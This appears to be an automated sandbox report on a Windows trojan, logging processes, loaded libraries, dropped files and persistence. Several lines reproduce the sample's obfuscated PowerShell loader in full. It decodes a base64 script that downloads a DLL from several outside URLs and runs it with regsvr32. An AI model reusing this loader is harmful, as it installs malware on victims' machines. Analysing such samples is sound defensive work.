Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000F554		17_2_000000018000F554
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018002975C		17_2_000000018002975C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018002B564		17_2_000000018002B564
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180012168		17_2_0000000180012168
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180013568		17_2_0000000180013568
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180024370		17_2_0000000180024370
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180008370		17_2_0000000180008370
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180015774		17_2_0000000180015774
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180012378		17_2_0000000180012378
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180019178		17_2_0000000180019178
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180025180		17_2_0000000180025180
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180001980		17_2_0000000180001980
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180021588		17_2_0000000180021588
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001A988		17_2_000000018001A988
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180018190		17_2_0000000180018190
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180013994		17_2_0000000180013994
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180026B98		17_2_0000000180026B98
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180028998		17_2_0000000180028998
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001CF9C		17_2_000000018001CF9C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000359C		17_2_000000018000359C
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001EBA0		17_2_000000018001EBA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800061A0		17_2_00000001800061A0
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800135A6		17_2_00000001800135A6
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180016DA8		17_2_0000000180016DA8
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800059AC		17_2_00000001800059AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000D7AC		17_2_000000018000D7AC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800053B0		17_2_00000001800053B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800135B4		17_2_00000001800135B4
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018001C1B8		17_2_000000018001C1B8
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180015BB8		17_2_0000000180015BB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800025B8		17_2_00000001800025B8
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800207BC		17_2_00000001800207BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800085BC		17_2_00000001800085BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800015C0		17_2_00000001800015C0
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000FFC0		17_2_000000018000FFC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800295C8		17_2_00000001800295C8
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800229CC		17_2_00000001800229CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018000E5D4		17_2_000000018000E5D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_000000018002A5D8		17_2_000000018002A5D8
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800173DC		17_2_00000001800173DC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180018BDC		17_2_0000000180018BDC
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00000001800261E0		17_2_00000001800261E0

Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FFC65CFB3B0 appears 148 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FFC65CFBD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe	Code function: String function: 00007FFC65CF7FF0 appears 31 times

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowscoredeviceinfo.dll			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll"			Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Documents\20220523

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skdzzo1y.zp2.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.win@26/11@2/4

Source: C:\Windows\System32\regsvr32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 17_2_0000000180006F2C FindCloseChangeNotification,Process32FirstW,CreateToolhelp32Snapshot,Process32NextW,

17_2_0000000180006F2C

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5216:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6364:120:WilError_01

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"			Jump to behavior

Source: unknown

Process created: cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}""

Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000C892 push ebp; retf		16_2_000000018000C895
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000D095 push B3B8007Eh; iretd		16_2_000000018000D09A
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000D0F3 push ebp; iretd		16_2_000000018000D0F4
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_0000000180013551 push ebx; retf		16_2_0000000180013559
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000D15D push ebx; retn 0068h		16_2_000000018000D15E
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000CDA8 push ebp; iretd		16_2_000000018000CDA9
Source: C:\Windows\System32\regsvr32.exe	Code function: 16_2_000000018000CE36 push 458B0086h; iretd		16_2_000000018000CE3B
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_0000000180013551 push ebx; retf		17_2_0000000180013559

Source: C:\Windows\System32\regsvr32.exe

Code function: 16_2_00007FFC65D00CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

16_2_00007FFC65D00CC0

Source: IKdzfJtQpj.BCP.2.dr

Static PE information: real checksum: 0x654f5 should be: 0x60ea5

Source: C:\Windows\System32\regsvr32.exe

Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll"

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP			Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe	File created: C:\Windows\System32\AHWppkeB\tZBUnLQvw.dll (copy)			Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe

File created: C:\Windows\System32\AHWppkeB\tZBUnLQvw.dll (copy)

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\regsvr32.exe

File opened: C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
